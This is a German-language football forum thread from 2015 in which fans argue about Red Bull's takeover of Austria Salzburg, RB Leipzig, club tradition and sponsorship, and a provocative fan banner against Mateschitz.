teilweise tuts aber gut, dass RB nicht alle Spiele halten kann. So blöd es aber auch klingt. Damari der Austria wegkaufen ist gut. A) Diesen Preis würde die Austria NIRGENDSWO sonst erzielen können. Das Damari im Sommer sowieso gegangen wäre bei den Leistungen sehe ich als fix an. Wenn nicht, dann wäre er aber auch nicht gut genug gewesen. So läuft halt die Liga. Und das halt die "oberen" Vereine den unteren was wegkaufen ist halt so. Das ist das System.
Die gibts doch mit den "FIFA FIFPro World XI"-Spielern:
TW: Manuel NEUER
VT: Sergio RAMOS
VT: THIAGO SILVA
VT: DAVID LUIZ
VT: Philipp LAHM
MI: Andres INIESTA
MI: Toni KROOS
MI: Angel DI MARIA
ST: Lionel MESSI
ST: CRISTIANO RONALDO
ST: Arjen ROBBEN
Hinterseer war bei mir in Klammern. Also für ihn gilt die Aussage nur abgeschwächt. ;-)
Dass er von seinem Trainer auf irgendeine Art und Weise mal getrennt dasteht, kann schnell gehen.
...und der 2.Schritt wäre dann, dass er nach Ö zurückkommt.
Dass es finanziell für die Vereine so gut ist, wie es abläuft ist unbestritten.
Glaub international stehen sie nach den D-Vereinen relativ gut da, was die möglichen (bzw unmöglichen, da Finanzial Fair Play) Schuldenberge angeht.
Die Austria wird mit dem Ersatzmann mMn nicht so gut abschneiden, wie erhofft. Ein Top3-Platz in der Tabelle wäre ja das, was für die Austria standesgemäß wäre.
Ich persönlich finds ja lustig, wie einfach die Ö-Vereine zu Geld kommen können. Das geht aber auch nur, weil ich kein Fan eines speziellen davon bin. Dann wäre jeder solcher Abgang schmerzlich!
Bei RB rütteln auch die Abgänge nix am Meistertitel, ABER international werdens damit diese Saison nix mehr reißen. 3 der Top 4 Offensivspieler könnens ned so schnell ersetzen.
Inzwischen hat sogar der Sportliche Leiter (Ragnick) zugegeben, dass RBL in Zukunft der Hauptverein werden soll.
Aktuell seh ich die 2 RB-Vereine sportlich auf ähnlichem Niveau. Ist Leipzig erstmal erstklassig, dürfens in Salzburg mit dem B-Team noch ca 3x internationale Luft schnuppern (da sich Leipzig ned international qualifizieren wird) und dann wird RBS entgültig zum reinen Ausbildungsverein. Da wäre dann Hütter als Ex-Juniors-Trainer eh schon an der richtigen Stelle. :-)
...und darunter leidet dann auch der Ruf der Liga, wenn zB ein Meister oder Vizemeister erst gar ned in Europa mitspielt. :-(
Meinte nicht 11. sondern eben 4. ich weiß es ist halt nicht das große "der beste der besten" Fußballer.
Jap Salzburg wird irgendwann die Ausbildungsstätte werden.
Salzburg hätte jetzt schon das Problem dass sie in der Liga nicht gefordert werden und daher international auch nicht das Maximum rausholen können.
Stiffler
06.02.2015, 22:29
Schwierig das passende Forum zu finden :-)
Zweite Liga ist auch wieder :clap: man glaubt man wäre kreativ gewesen in Aue, man fühlt sich wahnsinnig traditionell, in Aue - immerhin wurde man auch schon 1949 gegründet :doh:
http://fs1.directupload.net/images/150206/67j927pe.jpg (http://www.directupload.net)
http://fs2.directupload.net/images/150206/n6n62uge.jpg (http://www.directupload.net)
Von so ner Sch... möcht ich mich klar distanzieren!
shadow08
06.02.2015, 23:54
Ach komm, der Vergleich ist doch fast noch harmlos für R..B... :lol:
Was damals geschah war das schlimmste was man Menschen antun kann.
Was der aktuelle Typ macht ist das schlimmste was man dem Fussball antun kann.
Man darf es nicht 1 zu 1 vergleichen sondern jedes für sich und da ist dann schon was dran.
Stiffler
08.02.2015, 14:25
Ach komm, der Vergleich ist doch fast noch harmlos für R..B... :lol:
Was damals geschah war das schlimmste was man Menschen antun kann.
Was der aktuelle Typ macht ist das schlimmste was man dem Fussball antun kann.
Man darf es nicht 1 zu 1 vergleichen sondern jedes für sich und da ist dann schon was dran.
Da ich es ja hier (http://forum.du-bist-der-teamchef.at/showthread.php?p=1293129#post1293129)bereits ankündigte und aufgrund des Obigen.
Kurze Eindrücke meinerseits. Ich seh das "ein wenig" anders....
Alex, du bist Fan des 1886 gegründeten FC Arsenal London.
Du verachtest Red Bull, du verachtest Mateschitz.
Auf der anderen Seite aber kein Wort über den Trikotsponsor des FC Arsenal, die Emirates. Wie sehr Arbeiter in diesen Ländern ausgebeutet werden dürfte dir nicht entgangen sein. Das ist i.O?
Geht es um die Finanzkraft die Mateschitz seinen Bullen mit auf den Weg gibt?
Ok, wer hat das Emirates Stadion in London mitfinanziert denkst du?
Hier ein interessanter ink den ich mal gelesen hatte: Spiegel Online (http://www.spiegel.de/wirtschaft/unternehmen/islamfinanz-in-london-britischer-premier-cameron-wirbt-um-investoren-a-930727.html).
__________________________________________________ ____________
Der englische Fussball ist überhaupt sehr beliebt, sei es ManU, sei es Chelsea, sei es Liverpool. Ja, Geschichte haben Sie alle.
Aber, ganz interessant.
Sie haben die selben Absichten wie RB.
Ich behaupte: Sie wollen mit erheblichen finanziellen Mitteln sportlichen Erfolg generieren und darüber Marken etablieren sowie kommerziellen Erfolg ausschöpfen.
Anders ausgedrückt:
Berechtigt die Tatsache dass manch ein Verein 100 Jahre älter als RB Leipzig ist, den Fakt dass beide im Grunde das selbe wollen, nämlich mit Geldern, die sie beide nicht haben - die sie also von Dritten beziehen, sich den Erfolg versuchen zu kaufen?
Die alle, und einen davon unterstützt auch du, sind:
... das schlimmste was man dem Fussball antun kann.
__________________________________________________ ____________
Auch als Bayern Fan kann ich mir Dinge wie "du musst doch auch dem bvb die Daumen drücken" oder "du willst doch nicht dass Hamburg absteigt und sowas wie der Dosenklub aufsteigt" anhören.
Zum einen kann ich schwer bis nicht nachvollziehen was ein Nichtabstieg Dortmunds/Hamburgs oder Stuttgarts (allesamt "Traditionsvereine" :rolleye: im Sinne der Betrachtungsweise die ich kritisiere) mit der Sache RB zu tun hat, zum anderen soll jeder der sie sportliche Qualifikation dafür nicht aufbringt, runter gehen. Ausnahmslos!
Wenn diese selbsternannten Traditionsvereine also die Liga halten, bedeutet das eben nicht, dass die Dosen nicht aufsteigen.
Oder habe ich etwas versäumt?
Außerdem steht es jedem frei Gelder zu generieren. Klubs mit Investoren haben es leichter, keine Frage. Geschenkt wird denen aber auch nichts.
__________________________________________________ _____________
Alle Vereine waren irgendwann einmal "Neu"
Arsenal ist älter als Liverpool, ManU älter als Arsenal. Irgendwo dazwischen liegt Tottenham und davor noch Man City.
Was machen wir jetzt Man City?
Die haben Investoren wie Mateschitz (nur im ganz großen Stil!), die haben aber auch Erfolg, Erfolg macht sexy.
Aber die haben auch Tradition.
Soll man die jetzt "hassen" (im Sinne von verachten, siehe RB) oder nicht?
In München Giesing schreien sie 60! 60! 60! und vergessen dass ihr Fussballverein erst 1899 gegründet wurde, davor haben sie nur geturnt (somit greifen sie heute tatsächlich wieder vermehrt auf Tradition zurück :lol:)
Dieser Klub hat einen in Kuwait geborenen Investor der in einen Geldwäscheskandal von mehreren Hundert Millionen Dollar verwickelt ist - und seine Anhänger deuten mit dem Finger auf RB?
Ernsthaft?
Wenn ihr, die ihr RB verachtet, Werte wie Tradition achten möchtet, dann versucht doch bitte diese Werte richtig zu ordnen.
Jeglicher Profifussballverein ist frei von Tradition. Egal ob die Anhänger seit 2, seit 20 oder seit 150 Jahren in der Kurve stehen.
Austria Salzburg - nun ein fangetragener Verein im Vorbild vom FC United of Manchester (oder wie das hieß) beruft sich auf Traditionen, ist der größte "Feind" von RB.
Für die schlechte Wirtschaft, für den sportlichen Mißerfolg - da kann doch aber RB nichts dafür.
Interessant darüber hinaus, die so Traditionsbewussten Salzburger wurden im Original 1933 gegründet, also selbst für österreichische Verhältnisse sehr, sehr spät.
Die Mitglieder stützten und begrüßen den Einstieg von RB Anfangs ja noch.
Angemerken darf ich somit:
Glazers Übernahme beim FCUoM war der Grund für eine Neugründung wogegen Salzburger sich Ihren Göazer in Person von Mateschitz selbst ins Haus holten.
__________________________________________________ ___________
Ergänzender Link:
ältester Verein der Welt
http://de.wikipedia.org/wiki/FC_Sheffield
Hat alles außer Kommerz im Sinn. Ziel nach Vereinsangaben ist nicht, dass jeder Fan vom Verein wird, sondern dass jeder Fussballfreund als Zweitliebsten Verein den FC Sheffield nennt. ;-)
Zig Angebote zur Übernahme und die Aussicht auf bezahlten Fussball wurden im Laufe der Jahre abgelehnt.
Und ich hoffe dass dies weiterhin so bleibt!
shadow08
08.02.2015, 15:06
Austria Salzburg - nun ein fangetragener Verein im Vorbild vom FC United of Manchester (oder wie das hieß) beruft sich auf Traditionen, ist der größte "Feind" von RB.
Für die schlechte Wirtschaft, für den sportlichen Mißerfolg - da kann doch aber RB nichts dafür.
Interessant darüber hinaus, die so Traditionsbewussten Salzburger wurden im Original 1933 gegründet, also selbst für österreichische Verhältnisse sehr, sehr spät.
Die Mitglieder stützten und begrüßen den Einstieg von RB Anfangs ja noch.
Auf die Sachen um Arsenal gehe ich jetzt nicht genau ein, weil Arsenal kommt zwar bei mir gleich an 2. Stelle, aber ist halt nicht mein Herzensverein und daher nehme ich dort nicht alles unter die Lupe.
Ist also alles schön und gut erklärt von dir, aber die Hauptgründe fehlen.
Für mich waren die Leipziger vor RB uninteressant, ich will den Aufstand gegen RB auch nicht vergleichen zwischen Ö und D, weil es doch auch unterschiedliche Gründe dafür gibt, oder eventuell eh die gleichen? Wie gesagt ich weiß nicht wie es vorher bei Leipzig lief.
Nun aber zum wichtigeren Teil, den in Salzburg und nur um den geht es mir.
Hast du da alles bis ins Detail mitbekommen?
Du erwähnst unser Gründungsjahr, dabei ist es doch egal ob dies 1900 oder 1800 war, wenn diese Tradition einfach ausgelöscht werden soll dann ist sowas schlimm.
Es geht dabei auch nicht um das Sponsoring oder das Geld vom Herrn M.
Jeder Verein braucht Geld und somit Sponsoren, wichtig ist was man daraus macht. Ein Sponsor hat meiner Meinung nach nicht das Recht aus dem Verein nach eigenen belieben zu handeln und alles an sich zureißen. Ich weiß diese Meinung teilt nicht jeder mit mir, aber ich bin da halt anders gestrickt, solche Werte sind mir wichtig.
RB hat uns damals die Vereinsfarben genommen die wie ein Wahrzeichen für uns sind, die Namensänderung war nichts neues, aber halt auch nur im eigenen Interesse von ihm.
Auf Fanclubs wurde nicht mehr eingegangen bis diese aus dem Stadion raus waren.
Fragen wir mal anders, wäre es für dich ok wenn sich der tolle Herr M. nun deine Bayern kauft.
Neuer Name: Borussia Red Bull München (damits noch schlimmer für dich klingt :-P)
Neue Vereinsfarben: Grün oder Blau, suchs dir aus. (Wobei RB dir natürlich nicht die Chance des aussuchens lassen würde)
Fanclubs: Schickeria und vielleicht noch welche werden aus dem Stadion geeckelt.
Wäre dir alles egal?
Heutzutage geht halt alles nur noch ums Geld und auch die Spieler haben keine Vereinstreue mehr, da findest nur noch ganz wenige denen solche Werte wichtig sind. Ich finds einfach schade denn genau solche Werte sind mir wichtig.
Ein Beispiel für Spieler:
Das hab ich dem Mane auch schon mal erzählt.
Rene Aufhauser war immer einer meiner Lieblingsspieler, als er damals bei RB blieb, nach der Übernahme, habe ich es ihm nicht übel genommen.
Als er endlich weg wechselte war ich froh.
Zum ausklingen seiner Karriere ging er allerdings zu den RB-Amateuren, die in der gleichen Liga wie Austria Salzburg spielten und das sind Aktionen wo es den Spielern nur ums Geld geht und nicht um den Fussball, weil bei uns hätte er sogar noch 1-2 Saisonen anhängen können und uns sicher geholfen.
Er wäre ein Held gewesen, aber so ist er für mich komplett unten durch.
RB kann mir im Fussball gestohlen bleiben deshalb werd ich auch nie Mitleid mit ihnen haben egal wie sehr sie von den Gegner beleidigt oder sonst was werden.
Außerdem finde ich solche Beleidigungen ned so schlimm wie wenn da ein abgetrennter Kopf eines gegnerischen Spielers zu sehen ist, weil sowas könnte man sogar als Morddrohung auffassen, da find ich geht es dann zu weit.
Sind wir uns doch mal ehrlich, wenn ich dich heute als Nazi beschimpfe würdest mir wahrscheinlich nur widersprechen, wenn ich dich aber als H...S... bezeichne dann würdest mir sowas von in die Fresse hauen wollen, oder?
WICHTIG: nicht falsch verstehen dass war nur ein Beispiel.
Und grad solche Schimpfwörter kommen doch im Stadion viel öfter vor.
Alles ein gefundenes Fressen für die Medien und RB freut sich darüber weil sie als die Armen dargestellt werden und Mitleid erhalten.
Rene Aufhauser war immer einer meiner Lieblingsspieler, als er damals bei RB blieb, nach der Übernahme, habe ich es ihm nicht übel genommen.
Zum ausklingen seiner Karriere ging er allerdings zu den RB-Amateuren, die in der gleichen Liga wie Austria Salzburg spielten und das sind Aktionen wo es den Spielern nur ums Geld geht und nicht um den Fussball, weil bei uns hätte er sogar noch 1-2 Saisonen anhängen können und uns sicher geholfen.
ich hab Dir damals aber auch gesagt er hat Deine Werte erfüllt ;-)
er war bei RB und ist wieder zu RB gegangen und ned wieder zu einen anderen Verein 8-)
shadow08
08.02.2015, 15:23
ich hab Dir damals aber auch gesagt er hat Deine Werte erfüllt ;-)
er war bei RB und ist wieder zu RB gegangen und ned wieder zu einen anderen Verein 8-)
du siehst das auch zu gutmütig ;)
Stiffler
08.02.2015, 15:30
Nun aber zum wichtigeren Teil, den in Salzburg und nur um den geht es mir.
Hast du da alles bis ins Detail mitbekommen?
Es geht dabei auch nicht um das Sponsoring oder das Geld vom Herrn M.
Jeder Verein braucht Geld und somit Sponsoren, wichtig ist was man daraus macht. Ein Sponsor hat meiner Meinung nach nicht das Recht aus dem Verein nach eigenen belieben zu handeln und alles an sich zureißen. Ich weiß diese Meinung teilt nicht jeder mit mir, aber ich bin da halt anders gestrickt, solche Werte sind mir wichtig.
RB hat uns damals die Vereinsfarben genommen die wie ein Wahrzeichen für uns sind, die Namensänderung war nichts neues, aber halt auch nur im eigenen Interesse von ihm.
Auf Fanclubs wurde nicht mehr eingegangen bis diese aus dem Stadion raus waren.
Fragen wir mal anders, wäre es für dich ok wenn sich der tolle Herr M. nun deine Bayern kauft.
Neuer Name: Borussia Red Bull München (damits noch schlimmer für dich klingt :-P)
Neue Vereinsfarben: Grün oder Blau, suchs dir aus. (Wobei RB dir natürlich nicht die Chance des aussuchens lassen würde)
Fanclubs: Schickeria und vielleicht noch welche werden aus dem Stadion geeckelt.
Wäre dir alles egal?
Heutzutage geht halt alles nur noch ums Geld und auch die Spieler haben keine Vereinstreue mehr, da findest nur noch ganz wenige denen solche Werte wichtig sind. Ich finds einfach schade denn genau solche Werte sind mir wichtig.
RB kann mir im Fussball gestohlen bleiben deshalb werd ich auch nie Mitleid mit ihnen haben egal wie sehr sie von den Gegner beleidigt oder sonst was werden.
Außerdem finde ich solche Beleidigungen ned so schlimm wie wenn da ein abgetrennter Kopf eines gegnerischen Spielers zu sehen ist, weil sowas könnte man sogar als Morddrohung auffassen, da find ich geht es dann zu weit.
Sind wir uns doch mal ehrlich, wenn ich dich heute als Nazi beschimpfe würdest mir wahrscheinlich nur widersprechen, wenn ich dich aber als H...S... bezeichne dann würdest mir sowas von in die Fresse hauen wollen, oder?
WICHTIG: nicht falsch verstehen dass war nur ein Beispiel.
Und grad solche Schimpfwörter kommen doch im Stadion viel öfter vor.
Alles ein gefundenes Fressen für die Medien und RB freut sich darüber weil sie als die Armen dargestellt werden und Mitleid erhalten.
Schön dass du darauf eingehst und mir meine (auch bewusst etwas provokantere Meinung) nicht übel nimmst :up:
Vorab: Nein, ich hab enatürlich nicht alles mitbkommen was da in Salzburg lief. Das meiste kenne ich zugar nur aus wikipedia :-?
Dort gehen Sie halt auch darauf ein, dass der eigetliche Auslöser für das Überwerfen mit RB der Streit um das Violette war.
Ich denke dass der eigentliche Grund unserer verschiedenen Ansichten ganz einfach darin liegt, dass ich nachvollziehen kann, dass ein Sponsort nicht nur das Geld rein pumpt, sondern dann auch bestimmen möchte.
Wir in Bayern sagen dazu: "Wer zahlt schafft an, basta!"
Durchaus interessant für mich dein genanntes Beispiel mit dem Borussia RB München in blauen Vereinsfarben. :ban:
Hätte der Verein diese argen Geldprobleme und müsste sich verkaufen um weiter zu bestehen - ja, ich könnte es nachvollziehen und würde den Verein dafür nicht hassen.
Die Option lautet deutlich: Friss oder Stirb!
Die gewünschte Option: "Gib mir zu fressen aber ich leb wie ich will" stellt sich leider nicht.
Egal wäre es mir aber sicher nicht. Fanklubs wieder C12, die Schikeria, die RedBulls ;-), würden natürlich auf die Barrikaden gehen.
Traditionelle Spieler:
Die bewundere ich. Ich sehe aber den Ausnahmestatus den diese geniesen.
Ein Team kann heute nicht aus den Badstubers, Lahm´s, Schweinsteigers und Müllers alleine bestehen.
Ein Totti, ein Maldini, ein Gerrard, ein Messi - das sind die absoluten Ausnahmen.
Was den Nazi betrifft.
Ich denke schon lange dass wir mittlerweile in einer Generation angekommen sind, in der wir uns nicht mehr auf den Boden schmeißen und schämen müssen weil wir Deutsch sind. Der ganze Nazi Dreck ist mittlerweile so dermaßen alt und ausgelutscht, so dermaßen altbacken und völlig überholt, nicht zeitgemäß und intolerant, einfach furchtbar - und genau deswegen finde ich diese Aktion so sehr daneben ;-)
Schlußwort:
Gut getroffen, Aue verachtet den Schornstein Mateschitz und befeuert ihn kostenlos.
Bessere Werbung gibts bestimmt, aber definitiv keine Billigere :prost:
shadow08
08.02.2015, 15:55
Schön dass du darauf eingehst und mir meine (auch bewusst etwas provokantere Meinung) nicht übel nimmst :up:
Soweit solltest mich doch schon kennen. ;)
Vorab: Nein, ich hab enatürlich nicht alles mitbkommen was da in Salzburg lief. Das meiste kenne ich zugar nur aus wikipedia :-?
Dort gehen Sie halt auch darauf ein, dass der eigetliche Auslöser für das Überwerfen mit RB der Streit um das Violette war.
Ich denke dass der eigentliche Grund unserer verschiedenen Ansichten ganz einfach darin liegt, dass ich nachvollziehen kann, dass ein Sponsort nicht nur das Geld rein pumpt, sondern dann auch bestimmen möchte.
Wir in Bayern sagen dazu: "Wer zahlt schafft an, basta!"
So ist es leider und grad im Fussball muss man es doch nicht übertreiben. Ich habs damals schon gesagt, die RB-Dosen sind doch eh in so einem dunkelblau das einem violett schon fast ähnlich ist, da hätte man doch einen Kompromiss eingehen können.
Im Einzelsport sind solche Sachen sicher nicht dramatisch, aber in einem Mannschaftssport zählt gerade das 'Miteinander' und daran fehlts bei RB.
Durchaus interessant für mich dein genanntes Beispiel mit dem Borussia RB München in blauen Vereinsfarben. :ban:
Yes, voll ins Schwarze. 8-)
Hätte der Verein diese argen Geldprobleme und müsste sich verkaufen um weiter zu bestehen - ja, ich könnte es nachvollziehen und würde den Verein dafür nicht hassen.
Die Option lautet deutlich: Friss oder Stirb!
Die gewünschte Option: "Gib mir zu fressen aber ich leb wie ich will" stellt sich leider nicht.
Egal wäre es mir aber sicher nicht. Fanklubs wieder C12, die Schikeria, die RedBulls ;-), würden natürlich auf die Barrikaden gehen.
Hier würdest du also dann trotzdem bei RB München bleiben und nicht den Weg mit den Fanclubs von unten starten?
Für mich gehts dabei um das Identifizieren mit dem Verein. Das muss für mich stimmen und da ist mir die Liga egal, spielen wir halt nicht in der EL oder CL.
Traditionelle Spieler:
Die bewundere ich. Ich sehe aber den Ausnahmestatus den diese geniesen.
Ein Team kann heute nicht aus den Badstubers, Lahm´s, Schweinsteigers und Müllers alleine bestehen.
Ein Totti, ein Maldini, ein Gerrard, ein Messi - das sind die absoluten Ausnahmen.
Was den Nazi betrifft.
Ich denke schon lange dass wir mittlerweile in einer Generation angekommen sind, in der wir uns nicht mehr auf den Boden schmeißen und schämen müssen weil wir Deutsch sind. Der ganze Nazi Dreck ist mittlerweile so dermaßen alt und ausgelutscht, so dermaßen altbacken und völlig überholt, nicht zeitgemäß und intolerant, einfach furchtbar - und genau deswegen finde ich diese Aktion so sehr daneben ;-)
Im Grunde gehts doch nur ums provozieren und egal welche Person sie sonst auf das Bild gepackt hätten, keine Hätte so provoziert wie ein Hitler. Dagegen sind einfach immer noch alle allergisch.
Schlußwort:
Gut getroffen, Aue verachtet den Schornstein Mateschitz und befeuert ihn kostenlos.
Bessere Werbung gibts bestimmt, aber definitiv keine Billigere :prost:
Wie man sieht sind wir uns ja doch ziemlich einig. ;)
:prost:
PS: am meisten wird sich der termi freuen, weil er jetzt für kurze Zeit mal nicht derjenige ist der die mega langen Posts verfasst :lol:
Commander
08.02.2015, 16:05
@alex
Du brauchst mit einem Bayern Fan über so ein Thema nicht diskutieren
shadow08
08.02.2015, 16:40
@alex
Jedenfalls sinnvoller als es mit einem Dosen-Fan zu versuchen. :lol:
Commander
08.02.2015, 16:42
Jedenfalls sinnvoller als es mit einem Dosen-Fan zu versuchen. :lol:
Ich versteh deine ansichten auf jeden Fall zu 100%
Commander
08.02.2015, 16:45
An unsere Bayern hier:
Warum hattet ihr als Vereinsfarben damals auch "Blau-Weis"
bzw. wurdet ihr erst ein eigenständiger Verein im Jahre 1924, davor gab es noch keinen "FC Bayern München ;-)
und jetzt stellst uns Fragen ? :der::nachdenken:
Wieso hätte er das müssen?
Dem einzigen den du einen Vorwurf machen kannst ist Quehenberger. ER hat den Verein verkauft.
Die Alternative wäre gewesen einen Konkurs hinlegen wie Sturm Graz oder GAK.
Wo es dann stehen würde, ist was anderes.
Mateschitz geht's aber nicht darum sich mit anderen gut zu stehen. Er will Red Bull promoten. Darum geht's. Um nichts anderes.
So wie es Emirates geht sich bei Arsenal zu promoten. Und jeder andere Sponsor der Einsteigt.
Mateschitz ist aber nicht als Sponsor eingestiegen. Ganz einfach und das war von Anfang an klar.
Quehenberger hat einfach keine Aussicht gesehen. Man war so im Sand, dass er dies gemacht hat. Das war der Fehler. Und das war der Verrat am Verein.
Der Rest war nur logisch.
Man kann natürlich den Weg dann gehen und versuchen die alten Fans zu sich holen. Aber man muss dies nicht tun. Da der Verein nicht unter Sponsorschaft steht, hat man das sagen und kann machen was man will.
Sorry mir war damals klar, dass man nur einen schuldigen suchen muss (seitens des Vereins) dass man einfach sagt "sodalla wir haben die Nase voll wir ziehen unser Ding durch")
ich trinke persönlich schon laaaaaange kein Red Bull mehr. Geschmeckt hats mir schon irgendwie, habs aber so auch selten getrunken. War meist bei den Mischgetränken beim Fortgehen halt dabei.
Was Red Bull teilweise leistet ist nicht grad gut. Unteranderem der Druck auf die Extremssportler, dass sie immer mehr wagen und ihr Leben auch opfern.
Natürlich sind so einige Leute "finanziert" und können ihr Leben leben, aber da haben sich verdammt viele "verkauft". Finds schade, wenn dann das Geld drüber steht. Und das tuts halt bei einigen. Aber jeder muss für sich sein Leben managen. Und daher muss dies jeder für sich ausmachen.
Ich finde solche Aktionen schaden Red Bull nicht wirklich. Auch Shitstorm ist Werbung für Red Bull.
Gleiches in Wien mit dem Akademikerball. Ich bin felsenfest überzeugt, dass der NULL in den Medien vorkommt, wenns nicht diese Demos dagegen geben würde. Grad diese Demonstrationen sinds aber die immer wieder den Ball in die Medien bringen.
Besser wäre RB nicht so eine Plattform bieten. Und links liegen zu lassen.
Da in Österreich (bzw. eben in Leipzig) aber das bisherige Interesse zu wenig gewesen ist, kann man ruhig auf diese "früheren" Fans verzichten. Es wäre wesentlich schwieriger eben bei München oder Rapid dies zu versuchen, da der Aufstand zu groß ist. Nichts für ungut, aber wieviel hat RB in Salzburg verloren? Das ist "vernachlässigbar". So traurig diese Ansicht auch ist und ich ebenso nicht gut heisse. Ich finde es ebenso schade, dass hier alles so gekommen ist und heisse das alles nicht für gut.
Dennoch begann der Fehler schon weit vorher.
Stiffler
08.02.2015, 18:51
@alex
Sehr konstruktiver Beitrag :up:
Und dann Frage stellen :doh:
:mrgreen:
Für mich ist das Thema aber auch hier klar 2 geteilt.
Das in Deutschland sehe ich ganz anders als das in Österreich. Gut in Deutschland hatte ich nicht so den Einblick. Dort hat man aber einen Verein ganz weit unten aufgebaut. Alles übernommen zwar ebenso und dann alles aufgebaut und nach oben geführt.
In Österreich hat man sich dies eben "oben" zusammengekauft. Dazu kommt halt noch Pasching und Liefering wo man eigentlich eh alle verarscht.
Ich finds einfach schade, dass sich Salzburg damals verkauft hat. Das hätte man nicht zulassen müssen. Der Rest ist einfach Geschichte und sorry das wäre (ausser man hat eine rosarote Brille auf) abzusehen.
Wie gesagt RB Fussball (wurscht wo) ist ein reines Marketingprodukt. Man macht es NUR deswegen. (was ich ja auch verstehen kann, aber dann hätte man "neu" beginnen sollen und nicht einen Verein übernehmen und auslöschen, aber das liegt eben auch an der 2. Seite die ich dafür viel mehr kritisiere)
Ich wäre als Fan von Austria Salzburg NIEMALS mitgegangen zu RB Salzburg.
Wenn man aber KEIN Fan davor war, dann ist vieles anders.
Tradition ist halt ein Wort, dass ich dabei einfach nicht leiden kann. Weil es heuchlerisch ist. Was ist schon Tradition und weswegen berechtigt die einfach das Dasein in der höchsten Klasse.
In Österreich hat man quasi einen Verein übernommen und komplett verändert. Und das in der obersten Spielklasse. Und den Verlust der "alten" Anhänger war wurscht, weil man sich diesen Ausfälle (finanziell) leisten kann. Das könnte man mit Vereinen die mehr Mitglieder haben und mehr Fans haben wo die Saisonkarten auch einiges ausmachen nicht so leicht leisten.
In Deutschland gibt's genauso Wolfsburg und Leverkusen die anders sind als die anderen Vereine. Hoffenheim ja auch bald. (ist die Änderung eigentlich schon durch mit der 50+1 Regel?)
Nur dort stört man sich an RB wieso? ist VW da wirklich soviel anders oder lässt man das einfach, weil die schon "immer(?)" so waren? Wo ist da aber der Unterschied?
Commander
08.02.2015, 19:30
und jetzt stellst uns Fragen ? :der::nachdenken:
Sehr konstruktiver Beitrag :up:
Und dann Frage stellen :doh:
:mrgreen:
Haha, Ihr seids wie unser wappler :clap2::clap2::clap2::clap2:
Passendes Interview dazu mit Mateschitz:
http://www.kleinezeitung.at/s/sport/fussball/oesterreich/bundesliga/4657631/Dietrich-Mateschitz_RedBullChef-konnen-Fans-nicht-beirren
In Deutschland, auch bei Salzburgs Champions-League-Match in Malmö, gab und gibt es massive Proteste der Anhänger gegen den von einem Konzern vereinnahmten Fußball. Wie gehen Sie mit solchen Vorwürfen um?
MATESCHITZ: Massiv? Glauben Sie mir, diese sogenannten Fans bewegen sich im "parts per million"-Bereich. Und die Medien bieten ihnen die entsprechenden Steigbügel. Von so etwas lassen wir uns keinen Millimeter von unserem Weg abbringen.
shadow08
09.02.2015, 11:12
Entsetzt sind eh nur die Neutralen und bringen tuts leider auch nix, weil die Betroffenen nicht weiter darüber nachdenken sondern sich nur drüber aufregen wie furchtbar solche Aktionen sind.
Entsetzt sind eh nur die Neutralen und bringen tuts leider auch nix, weil die Betroffenen nicht weiter darüber nachdenken sondern sich nur drüber aufregen wie furchtbar solche Aktionen sind.
????
Versteh ich grad nicht wie du das meinst?
Ich finde es teilweise (nicht auf den Fussball bezogen) sehr schade, dass das Volk zuwenig Macht hat.
Ich heisse vieles nicht gut, was in der EU gemacht wird. Was Medien verbreiten OHNE dass sie journalistisch aktiv sind. Einseitige Berichterstatttung und damit Menschen beeinflussen.
(ala in der Ostukraine. Ich weiß ja nicht was dort wirklich vor Ort geht, aber man hört auch Sachen die die EU nicht gut darstehen lässt)
Ich finde es schade, dass vieles von oben runtergeregelt wird. (ala keine Glühbirnen und so; einheitliche Samen für Obst/Gemüse nur mehr sein darf und dergleichen)
Und dass die Leute zuwenig unternehmen um sich aufzulehnen. Früher wurde ja noch wirklich demonstriert. Das traut sich aber auch keiner mehr und auf FB ein Like geben ist ja wohl ein Witz. Nur wennst heute Demos hast mit 5.000 Leute ist die Aussage ja eigentlich erschreckend.
Genauso bei Unterschriftenaktionen wo man nicht raus muss auf die Strasse sind eigentlich vielzuwenig Stimmen teilweise die sich erheben.
Lassen sich die Bürger wirklich soviel mittlerweile gefallen? Ist es uns wurscht, was unsere Staatsoberhäupter machen? Oder sind wir schon soweit, dass wir es als "wir können es nicht ändern" einfach hinnehmen?
Das Ungleichgewicht ist sehr groß und wird noch zunehmen?
Passendes Interview dazu mit Mateschitz:
http://www.kleinezeitung.at/s/sport/fussball/oesterreich/bundesliga/4657631/Dietrich-Mateschitz_RedBullChef-konnen-Fans-nicht-beirren
In Deutschland, auch bei Salzburgs Champions-League-Match in Malmö, gab und gibt es massive Proteste der Anhänger gegen den von einem Konzern vereinnahmten Fußball. Wie gehen Sie mit solchen Vorwürfen um?
MATESCHITZ: Massiv? Glauben Sie mir, diese sogenannten Fans bewegen sich im "parts per million"-Bereich. Und die Medien bieten ihnen die entsprechenden Steigbügel. Von so etwas lassen wir uns keinen Millimeter von unserem Weg abbringen.
das ist ein schwieriges Thema Joker ;-)
weil es gibt Leute die haben Ihre Feindbilder die Sie sich malen ;-)
ein Beispiel:
CL Finale in München
die Bayern hasser haben sich gefreut das der FC Chelsea das Finale gewonnen haben.
jetzt stellt sich die Frage warum mögen Sie Bayern nicht? Die meisten weil Bayern ein reicher Verein ist! Was die meisten vergessen die haben Ihr Geld selber erwirtschaftet.
Jetzt zum FC Chelsea:
das Abramowitsch bis zu dem Gewinn der CL ca. 1 Milliarde Euro in den Club gesteckt hat wissen die meisten nicht! Wie Abramowitsch zu seinem Geld kam wissen die wenigsten! Er hat es sich er schummelt!! siehe hier: http://de.wikipedia.org/wiki/Roman_Arkadjewitsch_Abramowitsch
Und genau die die sind gegen Red Bull!
wenn man sich mal den Werdegang von Abramowitsch und Mateschitz vergleicht http://de.wikipedia.org/wiki/Dietrich_Mateschitz
bei Mateschitz dass müssten die meisten von Euch ja wissen war es doch so wenn die Genehmigung das er Red Bull verkaufen darf noch länger als 3 Monate gedauert hätte würde es Red Bull heute nicht geben weil er dann Pleite gewesen wäre!
soviel ich weiß hat Mateschitz damals als die Genehmigung durch war mit der Firma Rauch einen Handschlagvertrag gemacht zum abfüllen von Red Bull und der Handschlagvertrag soll heute noch gelten :shock:
Jetzt ist mein Fazit einer von beiden hat Charakter und einer nicht!
Auf der einen Seite schreiben hier einige das ihnen Werte wichtig sind und im gleichen Atemzug treten sie ihre eigenen Werte mit dem Fuß ;-)
shadow08
09.02.2015, 12:07
Einem neutralen Fussballfan, der sich mit dem Thema RB ned beschäftigt, ist so eine Aktion einfach zu heftig.
